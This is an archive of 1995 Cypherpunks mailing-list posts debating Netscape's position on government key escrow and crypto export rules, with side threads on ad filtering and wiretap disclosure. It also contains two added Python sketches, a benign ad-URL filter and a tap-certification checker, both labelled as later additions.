>At 10:45 AM 12/1/95, JR@ns.cnb.uam.es wrote:
>>With regard to all this waving about Netscape giving in to key scrow...
>
>Key _escrow_, though "scrow" is perhaps just as accurate as the
>improperly-named "key escrow" (hint: escrow is something done voluntarily,
>not the situation here with GAK).
>
	Yup. I should have said "mandatory key scrow". Sorry for using a
shorthand.

>Having said this, I think all of the shareholders, either of issued shares
>or as-yet-unissued shares, are interested in maximizing share value. Not
>surprising.

	That's the point. They look after *their* interests, not after
"public" interest, especially where "public" is a local (as big as local
to US may be) interest in a global economy.

>Importantly--and maybe this is the real point JR is making--we on the
>Cypherpunks list are probably *not* interested in Netscape's stock price.
>But who cares? Our role is not to maximize Netscape stock price, but to
>talk about what is "right" and what is not right. And GAK is definitely not
>right, to the vast majority of us.

	Right. What I wanted to say was exactly that.

>They were "criticized" not because they went public with their stock but
>because of their security mistakes, made more important by their sudden

	The point is not why they were chased but the fact they were. It
reflects on further reticences by crypto-interested people to get involved
and opens more field to crypto-unaware or uninterested people to gain
control of the company.

...
>Well, this is the point, isn't it? I doubt there are such things as "tax
>reliefs" for Netscape--these things are done pretty much out in the open in
>the U.S., and any special tax treatment would be widely noticed--but there
>may indeed have been "discussions" with senior management at Netscape.
>Several of us have already speculated in broad terms on this.

	Well, I don't know about what kind of compensation could be
offered. Tax reliefs was just a suggestion. What about saying "hey
guys, if you comply with our demands we'll set Netscape as the standard
browser for the administration. If you don't you won't sell a copy".
In any case, the point is that a Government (any) can make strong pressure,
especially one as big as USA's Gov. And facing it is a risky position.

...

>First, a viable strategy is to simply do nothing. Ignore the goverment's
>protestations, drag one's feet, shrug, etc. Jim Clark could simply have
>said nothing. (Recall that Bill Gates came out recently saying that strong
>encryption is inevitable...Clark could have either said nothing, or said
>something similar to what Gates said.)

	That may be a very bad move from their point of view. If the Gov.
pushes hard, and it is an important customer, it is in their interest
to satisfy them. As long as anyone else wants to follow the Gov. it is
also good for them to follow those lines, and to be the first ones.

	What about foreign customers? If the Gov. can restrict export of
your technologies, they'll move to other providers. It is better for
you to pay homage to the Gov. requests and get to overseas markets
faster and sooner than anyone else.

>Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
>truly pushes for GAK, and people reject GAK and Netscape, then this will
>surely hurt shareholder value. (Frankly, I expect one or more stories to
>appear in the next few days about the budding "Friends Don't Let Friends
>Use Netscape" and "Just Say No to Netscape" movements. Whether this will
>hurt the stock is unclear.)

	The "just say no" movement is OK as long as you don't append
"to XXX". It could work if it is only Netscape... But as soon as anyone
else gives in (e.g. Microsoft) it will become a burden. It's much better
IMHO to ask "say yes to privacy". It's much better to say "this page is
optimized for good safety and may not be reliable under non-crypto
browsers -e.g. Netscape-" than saying "your browser is bad". Which
BTW, may be OK in the USA, but is not in other places. Belgium comes
to mind for forbidding negative advertising. And surely others. 

...
>I say that the ideas being discussed are in fact "constructive" ideas.  I
>won't reiterate them all here, but they clearly involve concrete action
>(e.g., modifying server software to issue warnings to Netscape users, or
>encouragement of alternatives to Netscape).

	Some of them are. Others are not. Others are destructive (like
denying access to Netscape users), or unpracticable (like saying "Mozilla
is not the best thing" in some places), or unrealistic (like saying "quit
your job"), or plain silly.

	If you deny access to a user, you'll make him/her angry. And not
angry with Netscape. They'll be angry with you. We need people on our
side. That's basic psychology. I'd go for more pages explaining what
crypto is and can do for Joe Random.

	Many people have said "I can do this or that with my server or
whatever". How many people are offering an alternate safe crypto service
and making it interesting and desirable for Joe Random? And making it 
well known? I'd say that not enough. 

	If you can offer an attractive service, protected with another
crypto method, and make it popular, people will demand it. If you just
add a note saying you use that crypto 'cos Government-enforced crypto is
not good enough, people will feel happy and will learn.

	In general, people prefer positive presentations to complaints
or problems. Have a look at TV ads. How many of them say "Don't use
that stuff, it's shit" instead of "Use my stuff, it's better".

	That's what I advocate: a positive course of action, offering
a better alternative. Not just a storm of complaints or "bad karma".

>What more are you expecting? Have you been reading what people are actually
>discussing doing and actually already doing?
>
	Yes, I've read all along. As I hope will be more clear now. And
I have found lots of people saying "I won't support Netscape", "I will
say no", "I will deny access to Netscape", "I'll add a complaint to my
page", "Jim should retract", "Netscape should go back", "Netscape better
changes its money-making policy and becomes a political activist", 
"This or that guy must quit job"...

	What I was expecting is people to be more realistic, not to forget
that the main goal of a company is to make money instead of defending public
freedom (which indeed is bad for business), and start promoting better (or
not) alternatives.

	And, to finish, note that I have also seen some very good answers,
on which I don't comment since I agree and have little to add to.

>--Tim May
>
				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 1 Dec 95 18:54:52 PST
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <199512020254.TAA04583@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I know I may be asking for this a second time,

But just what is James Clark's E-Mail Address?

Thanks!
Happy Holidays!

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Fri, 1 Dec 95 23:17:29 PST
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
In-Reply-To: <199512020326.EAA25501@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951202021203.28980B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Wilhelm Busch wrote:

> >Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
> >clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
> >Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
> >puts them in.)

> A while back, someone on comp.infosystems.www.* posted patches to CERN httpd
>  allowing the proxy server to filter out url's based on regexp matching.
> Thus you could update a regexp file as new ads appeared.

I think the author, Axel Boldt, posted this URL to cypherpunks a while 
back...

From http://emile.math.ucsb.edu:8000/~boldt/NoShit/index.html :

Filtering the Web using WebFilter

This document describes the WebFilter (formerly known as NoShit) extension 
to Cern's httpd web server which allows you to filter out annoying parts 
of web pages that you visit often. 

Why to use WebFilter

You have probably noticed how many popular web sites that offer cool 
stuff sooner or later inevitably turn to advertising. They are very 
welcome to do that, of course, except if they try to place their shit on 
my computer screen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 95 19:26:09 PST
To: cypherpunks@toad.com
Subject: Re: A "Warning Banner" for Netscape Navigator? Good idea!
Message-ID: <199512020326.EAA25501@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@got.net (Timothy C. May) wrote:
>Oh, I don't have their home page enabled. What I meant, but perhaps wasn't
>clear about in my post, is that the commercials pop up in Yahoo, Infoseek,
>Deja News, Excite, and so forth. (OK, so it is inaccurate to say "Netscape"
>puts them in.)
>
>Some of the ads are intertwined with the command boxes of the particular
>service, and thus may be hard to excise, but others seem to be separate.
>
>Any ideas?
>
>--Tim May

A while back, someone on comp.infosystems.www.* posted patches to CERN httpd
 allowing the proxy server to filter out url's based on regexp matching.
Thus you could update a regexp file as new ads appeared.

It should be fairly easy to implement something similar under Netscape 2.x
using plug-ins. Anyone interested in collaborating?

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
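
The regexp-file approach mentioned in the message above, sketched as an added example that is not part of the original posts and is not WebFilter's code. The rule-file layout (one pattern per line, `#` comments), the sample URLs and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed rule file: one regular expression per line, '#' starts a comment.
# This layout is assumed for the example; it is not WebFilter's own syntax.
SAMPLE_RULES = r"""
# ad banners served from a dedicated path
^http://[^/]+/ads?/
# any image whose file name contains "banner"
/[^/?]*banner[^/?]*\.(gif|jpe?g)(\?|$)
# deliberately malformed: a bad rule is reported, not fatal
([unclosed
"""


def load_rules(text):
    """Compile every rule line; return (rules, errors), each tagged with its line number."""
    rules, errors = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            rules.append((lineno, re.compile(line)))
        except re.error as exc:
            # One bad pattern must not disable the whole filter.
            errors.append((lineno, str(exc)))
    return rules, errors


def normalize(url):
    """Lower-case the host and drop the fragment (urlsplit already lower-cases the scheme)."""
    parts = urlsplit(url)
    return parts._replace(netloc=parts.netloc.lower(), fragment="").geturl()


def match_rule(url, rules):
    """Return the line number of the first rule that matches the URL, or None."""
    target = normalize(url)
    for lineno, pattern in rules:
        if pattern.search(target):
            return lineno
    return None


def filter_urls(urls, rules):
    """Split requested URLs into (allowed, blocked) lists, as a proxy would."""
    allowed, blocked = [], []
    for url in urls:
        if match_rule(url, rules) is not None:
            blocked.append(url)
        else:
            allowed.append(url)
    return allowed, blocked


if __name__ == "__main__":
    rules, errors = load_rules(SAMPLE_RULES)
    requests = [  # constructed sample requests
        "HTTP://WWW.Example.COM/ads/today.gif",
        "http://search.example.com/img/top_banner2.gif?id=9",
        "http://www.example.com/adserver-docs/index.html",
    ]
    allowed, blocked = filter_urls(requests, rules)
    print("skipped rules:", errors)
    print("blocked:", blocked)
    print("allowed:", allowed)
```

Matching on the normalized URL keeps a rule anchored at `^http://` from being sidestepped by an upper-case scheme, and reporting the bad pattern by line number makes a typo in the rule file visible instead of silently weakening the filter.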






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 2 Dec 95 10:41:02 PST
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: "Got a subpoena?"
Message-ID: <m0tLwij-00090FC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 30 Nov 1995, sameer wrote:
>
>> > 
>> > What about a court order to (a) start comprehensive logging, and (b) not
>> > tell anyone under penalty of ______ .
>
>I am unaware of any authority for such an order.
>> 
>> 	Aren't court orders part of the public record? I don't quite
>
>Yes, but court orders can be sealed pending further order of the court.

Okay, maybe with your qualifications you can answer this.  It has always
mystified me why "the authorities" think they can engage in wiretapping
without informing the person wiretapped that this has occurred, despite the
fact that there was apparently never any precedent for this practice before
the "wiretap era."

In addition, I would like to be able to figure out a method to allow the
de-facto disclosure of such activities, and to in fact force the phone
company to do so, if they are asked to tap my or anyone else's phone.  It
occurred to me that even if there was a prohibition on explicitly revealing
that such a tap exists, it should be possible to require the telephone
company to certify that no tap exists, and to require that this
certification will be followed by an explicit and immediate de-certification
message the moment the phone company is unable to maintain such
certification.  The receipt of such a letter/fax/email will indicate that a
tap has been placed, despite the fact that it will not say so.


>EBD
>
>Not a lawyer on the Net, although I play one in real life.
>
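
The certification scheme proposed in the message above, sketched from the subscriber's side as an added example that is not part of the original message. The notice format, the HMAC tag standing in for a real digital signature, the seven-day re-certification interval, the phone number and all names are assumptions.

```python
import hashlib
import hmac
from datetime import date, timedelta

KEY = b"constructed-demo-key"    # assumption: stand-in for the carrier's signing key
MAX_AGE = timedelta(days=7)      # assumption: a certification must be renewed weekly
STATUSES = ("CERTIFIED", "DECERTIFIED")


def _tag(body, key):
    return hmac.new(key, body.encode(), hashlib.sha256).hexdigest()


def make_notice(line, status, issued, key=KEY):
    """Carrier side: 'line|status|date|tag' (constructed format)."""
    body = f"{line}|{status}|{issued.isoformat()}"
    return f"{body}|{_tag(body, key)}"


def parse_notice(raw, key=KEY):
    """Return (line, status, issued) for an authentic notice, else None."""
    parts = raw.split("|")
    if len(parts) != 4:
        return None
    line, status, issued_s, tag = parts
    expected = _tag("|".join(parts[:3]), key)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None                      # forged or corrupted notice
    if status not in STATUSES:
        return None
    try:
        return line, status, date.fromisoformat(issued_s)
    except ValueError:
        return None


def line_status(notices, line, today, key=KEY):
    """Status implied by every notice received so far for one line.

    The newest authentic notice decides, so replaying an old certification
    after a de-certification changes nothing; silence past MAX_AGE is
    reported as LAPSED rather than treated as continued certification.
    """
    newest = None
    for raw in notices:
        parsed = parse_notice(raw, key)
        if parsed is None or parsed[0] != line:
            continue
        _, status, issued = parsed
        if issued > today:
            continue                     # post-dated notice: ignore
        # On the same date a de-certification outranks a certification.
        rank = (issued, status == "DECERTIFIED")
        if newest is None or rank > newest[0]:
            newest = (rank, status)
    if newest is None:
        return "NO_CERTIFICATION"
    (issued, _), status = newest
    if status == "DECERTIFIED":
        return "DECERTIFIED"
    return "LAPSED" if today - issued > MAX_AGE else "CERTIFIED"


if __name__ == "__main__":
    line = "555-0100"                    # constructed number
    inbox = [
        make_notice(line, "CERTIFIED", date(1995, 12, 1)),
        make_notice(line, "CERTIFIED", date(1995, 12, 8)),
    ]
    print(line_status(inbox, line, date(1995, 12, 10)))   # within the interval
    print(line_status(inbox, line, date(1995, 12, 20)))   # renewal never arrived
```

The lapse case matters as much as the explicit notice: if the de-certification message itself were suppressed, the missing renewal still changes the reported status.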





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 13:14:45 PST
To: sameer <nowhere@bsu-cs.bsu.edu (Anonymous)
Subject: Re: your mail
Message-ID: <199512032115.NAA20213@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 11:32 PM 12/2/95 -0800, sameer wrote:
>	I hate to repeat myself, but sometimes people don't listen.
>http://www.c2.org/apachessl/
>


This Web page fails to explain what Apache-SSL actually is, what it is good
for, and why people should use it.

Looks like the page was constructed by the same marketing experts as 
Central Point Software employed before it went under.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 13:41:19 PST
To: cypherpunks@toad.com
Subject: Re: Do the Right Thing
Message-ID: <199512032141.NAA05386@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 PM 12/3/95 -0800, Timothy C. May wrote:
>Netscape, being the dominant browser company, and Microsoft, being the
>dominant OS company, are in special positions to "build in Big Brother."

Bill Gates, after some ducking, weaving, and equivocating, has said
that GAK is a violation of our right to privacy.

Jim Clark has said that GAK is the government benevolently protecting
our privacy.

I hope to see a "clarification" of Clark's position soon, and I am
far from happy with the "clarification" provided by Jeff.

> Netscape is becoming the yellow corn of the Web, and an obvious
> "choke point" for the NSA and its sisters to mandate crypto policies.
> Hence, the role of non-yellow-corn alternatives...)

I recommend Mosaic, much improved in its latest release, and, unlike
Netscape, standards compliant.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 15:41:56 PST
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <9512021318.AA27932@all.net>
Message-ID: <30C0E317.71DC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> >   I had lunch with Jim Clark today, and explained the furor that was
> > currently going on in cypherpunks and elsewhere.  After lunch he sent
> > me the e-mail that I've attached below to pass along.  I think the gist
> > of it is that if governments require key escrow, we will have to do it
> > in order to sell our products with encryption into those countries.
> 
> The point Netscape seems to miss is that by refusing to go with weak
> crypto and having the best product on the market, Netscape may be able
> to force these governments into a position of accepting it.
> 
> Suppose Netscape took the position that it was 512 bit RSA, and that it
> was for sale to anyone who wanted to buy it? The result would either be
> a billion dollars of market impact and a collapse of the high-tech stock
> bubble we are now building, or the government backing down.

  This is exactly what the government wants.  Some of the largest
software companies have been producing software that only supports
short key lengths for both export and domestic use for years, and
it has not caused the government to back down.  

> If the US government backed down, and Netscape became the best product
> around and maintained that lead for a long time, other countries would
> either have to allow Netscape in, or suffer the consequences of falling
> behind in the IT curve.

  Many customers in other countries want our US version.  They are pushing
on their governments and the US government to get it.  This is already
happening.

	--Jeff
  
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:11:23 PST
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <30C0E933.851@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


E. ALLEN SMITH wrote:
>         I believe that the central question at hand is whether Netscape will
> incorporate mandatory GAK into any of its products if you have an economic
> (governmental purchase) rather than physical (governmental threat of violence)
> reason to do so. I would hope that the upcoming statement will clarify this
> position, and in the proper direction.
>         -Allen

  If the government wants to purchase software for its own use that implements
key escrow, why is that bad?  The whole point of our anti-GAK position is that
government mandated key escrow is bad.  If individuals, companies, or government
agencies want to escrow their own keys, with the escrow agents of their own
choosing, I have no problem.  It's only when the government makes the escrow
and the agent mandatory that I've got a problem.

  I don't believe that Netscape will ship a product that mandates GAK
unless it was required by law to do so.  As long as it is legal to sell
non-escrowed crypto products in this country or elsewhere, I think we
will keep doing it, because that is what our customers want.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:13:06 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512021603.IAA00950@blob.best.net>
Message-ID: <30C0EA69.4806@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote:
> >
> >  I think the gist
> > of it is that if governments require key escrow, we will have to do it
> > in order to sell our products with encryption into those countries.
> 
> Jim Clark wrote:
> >> But if we do not come up with a solution to this problem that is
> >> acceptable to each government, we will not be able to export our products,
> >> except with a short key length (e.g. 40 bit keys), and that will not be
> >> acceptable to corporate customers in other countries.
> 
> I read it as saying:  "Let us help the government invade the privacy
> of our customers, so that the government will do us some favors in export
> licensing", rather than "Well if they stick it to us at gunpoint,
> we will submit."

  After talking with Jim over lunch, I believe that the second interpretation
is more accurate, and is certainly true of the company's position at this
point.  Also keep in mind that Jim's comments are his own opinion, and do
not necessarily represent the position of the company.  Barksdale's law is
that we provide value to our customers.  Our customers want long keys and
no GAK, both within and outside the country.  As long as we are legally
allowed to do that, I think we will.  The fact that customers know the
dangers of 40-bit keys, and that it is the government that is forcing
them to use weak keys, is in large part due to the brute force cracks
of the cypherpunks.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:29:09 PST
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202140203.1199A-100000@polaris.mindport.net>
Message-ID: <30C0EE0D.48A9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> > >
> > > On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> > > >   See my recent message to this list.  We will be taking an anti-GAK
> > > > position.
> > >
> > > So you will refuse to implement GAK in future version of netscape then?
> > > Or you will merely do lipservice to the GAK policies at the conference?
> > >
> > > I think the distinction is quite key.
> >
> >   If the law requires GAK, then I believe that we will implement it rather
> > than just disable encryption.  We are taking a position against GAK and
> > will continue to lobby against it.  We are planning to continue to do both
> > US and Export versions, so I don't think that the government's ploy of
> > trying to lure companies into weakening their domestic versions will work.
> 
> AT&T seems to have been suitably 'incentivized'
> The receipt of government funding (in whatever guise) might be just as
> powerful in this case.
> 
> To the outsider, it looks as if Netscape 'owes' the government.

  We do owe the government.  They have paid us for Servers and Clients
that support Fortezza.  That is what we owe them.  The money that the
NSA gave us for Fortezza is not very significant compared to what we
are getting from commercial sources.

> > We released a 128-bit version of our product almost a year ago, at a
> > time when many companies were providing only weak crypto in their domestic
> > products so that they didn't have to trouble themselves with two versions.
> 
> And this is impressive.  Stamina, however, is much more difficult.
> 
> > We are actively lobbying in washington to get clarification of the
> > current regulations so that we can provide the US version via an "export
> > controlled" FTP or HTTP download.
> 
> With which firm?  Or have you made it an in-house effort?

  We have recently hired a government liaison person to manage our policy
discussions with the government.  He is one of the people that will be
talking to congressional and white house representatives next week.
I don't know if we have made use of any outside lobbying firms.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 95 16:36:08 PST
To: sameer <sameer@c2.org>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512021936.LAA09776@infinity.c2.org>
Message-ID: <30C0EF90.132D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> >
> > With which firm?  Or have you made it an in-house effort?
> >
> 
>         There was no Netscape (or RSADSI, for that matter [an RSADSI
> employee showed up, but it was on his own time]) representative at the
> recent Bernstein hearing in SF. I think that shows how much they
> really care.

  How would having an official representative from Netscape in
the audience have influenced the outcome of the proceedings?  I would
have liked to attend, but was in the process of trying to get
a beta release out at the time.  Do you honestly believe that the
only people who want Bernstein to win are those who were present
in the court room that day?  Not even Dan himself was there.
Does that mean that he doesn't care about the outcome of the case?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 2 Dec 95 15:01:11 PST
To: cypherpunks@toad.com
Subject: update.250 (fwd)
Message-ID: <199512022305.RAA05770@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From physnews@aip.org Fri Dec  1 18:18:29 1995
Date: Fri, 1 Dec 95 14:44:34 EST
From: physnews@aip.org (AIP listserver)
Message-Id: <9512011944.AA12171@aip.org>
To: physnews-mailing@aip.org
Subject: update.250


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 250 December 1, 1995       by Phillip F. Schewe and Ben Stein

TWO-BIT QUANTUM LOGIC GATES have been experimentally
demonstrated for the first time.  Analogous to conventional electronic
logic gates in personal computers but different in that they follow the
strange rules of quantum mechanics, a quantum logic gate, in its
simplest form, consists of two "qubits."  Each qubit is a quantum
system (for example an atom or a photon) having two states
corresponding to the 0 and 1 of a conventional gate.  Unlike an
ordinary digital bit, a qubit can be in a combination or
"superposition" of 0 and 1, offering the potential for unique kinds of
calculations.  A NIST team (Chris Monroe, 303-497-7415) uses a
single trapped beryllium ion to demonstrate a two-bit quantum logic
gate.  One bit, the control bit, is specified by the (quantized) external
vibrations of the ion in the atom trap; the two lowest vibrational
levels correspond to values 0 and 1.  The other bit (the target bit) is
specified by an internal state of one of the ion's electrons; it has a
"spin-down" state (0) and a "spin-up" state (1). Shooting laser pulses
at the single ion causes it to act as a two-bit "controlled NOT" gate.
If the control bit is 0 then the target bit is left alone.  If the control
bit is 1 then the target bit flips its spin.  Meanwhile, a Caltech group
(Quentin Turchette, 818-395-8343) has demonstrated the feasibility of
using a pair of electromagnetic fields (each representing a single
photon or less) as a two-bit quantum gate.  When the two fields
interact with an atomic beam in between a narrow cavity, the first
field, having one of two orientations, or "polarizations," can control
the phase of the second field; switching the polarization prevents the
first field from controlling the phase. Finally, in a paper submitted to
Physical Review Letters, a team at the Ecole Normale Superieure
(Serge Haroche, haroche@physique.ens.fr) reports a quantum logic
gate in which a two-level electromagnetic field in a cavity changes the
energy level of a Rydberg atom (an atom in a highly excited state) in
the cavity.  All groups are currently attempting to string together
multiple gates, but this remains a major challenge.  Performing the
powerful calculations envisioned with quantum computers would
probably require thousands of gates, but Haroche warns that systems
of quantum gates are likely to become "decoherent," or lose their
quantum properties, beyond several tens or hundreds of gates.  While
practical "quantum computers" might be difficult to realize with
present concepts, physicists believe these two-bit experiments may
pay off by opening possibilities for practical schemes of quantum
teleportation and quantum cryptography and by bringing new insights
into, as Haroche puts it, "the fuzzy boundary between the classical
and quantum worlds."  (C. Monroe et al. and Q. A. Turchette et al.,
two upcoming articles in Physical Review Letters, tentatively Dec.
11; journalists should contact AIP Public Information at
physnews@aip.org)

EVIDENCE FOR COSMIC RAYS COMING FROM A
SUPERNOVA has finally been observed.  The standard opinion about
cosmic rays is that the lower-energy rays (up to an energy of 10**15
eV) probably originate in our galaxy and consist of electrons and ions
accelerated to high speeds by supernova shocks.  (Higher-energy
cosmic rays may be extragalactic in origin.)  New pictures of
supernova SN1006 recorded by the orbiting ASCA x-ray telescope
reveal both thermal x rays---the radiation coming from supernova
remnant material at high temperature---and non-thermal x rays from
the limb of the supernova---synchrotron radiation from high energy
electrons (100 TeV), presumably energized by the outward-moving
shock front from the supernova.  The ASCA scientists expect that
ions too are being accelerated by the same mechanism.  (K. Koyama
et al., Nature, 16 November.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 2 Dec 95 16:09:49 PST
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <30C0E317.71DC@netscape.com>
Message-ID: <199512030009.SAA00717@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>   Many customers in other countries want our US version.  They are pushing
> on their governments and the US government to get it.  This is already
> happening.

Couldn't you set up a company in the Netherlands or some such place that 
allowed you to export to the rest of the world?

There could be a US version of Netscape, produced here in the States, and
a strong international version produced by a different company, using non
crypto technology licensed from Netscape and a crypto engine produced
entirely offshore.  You could make the offshore firm virtually worthless
by forcing them to give all the money to Netscape proper in the form of
licensing fees.  It wouldn't matter who owned it, so you could give the
franchise to a Dutch national without giving away the store.

I seem to remember US companies getting around restrictions on doing
business with South Africa using a similar strategy. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Sat, 2 Dec 95 15:56:39 PST
To: jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jsw@netscape.com"  "Jeff Weinstein"  2-DEC-1995 02:26:13.63

  I had lunch with Jim Clark today, and explained the furor that was
currently going on in cypherpunks and elsewhere.  After lunch he sent
me the e-mail that I've attached below to pass along.  I think the gist
of it is that if governments require key escrow, we will have to do it
in order to sell our products with encryption into those countries.

> If we as a company were to take the position that in no case will we allow
> a government to get access to our encrypted messages, or refuse to allow
> key escrow with our products, the governments of the world will quickly put
> us out of business by outlawing the sale of our products in their countries.
> The fundamental issue is how do we accommodate the requirements of
> governments, while protecting our rights as citizens.
> 
> None of this represents the position of Netscape with respect to what we
> will do. But if we do not come up with a solution to this problem that is
> acceptable to each government, we will not be able to export our products,
> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.
----------------------
	I believe that the central question at hand is whether Netscape will
incorporate mandatory GAK into any of its products if you have an economic
(governmental purchase) rather than physical (governmental threat of violence)
reason to do so. I would hope that the upcoming statement will clarify this
position, and in the proper direction.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:00:08 PST
To: Jeff Weinstein <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512040700.XAA14434@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 12/2/95 -0800, Jeff Weinstein wrote:
> The whole point of our anti-GAK position is that
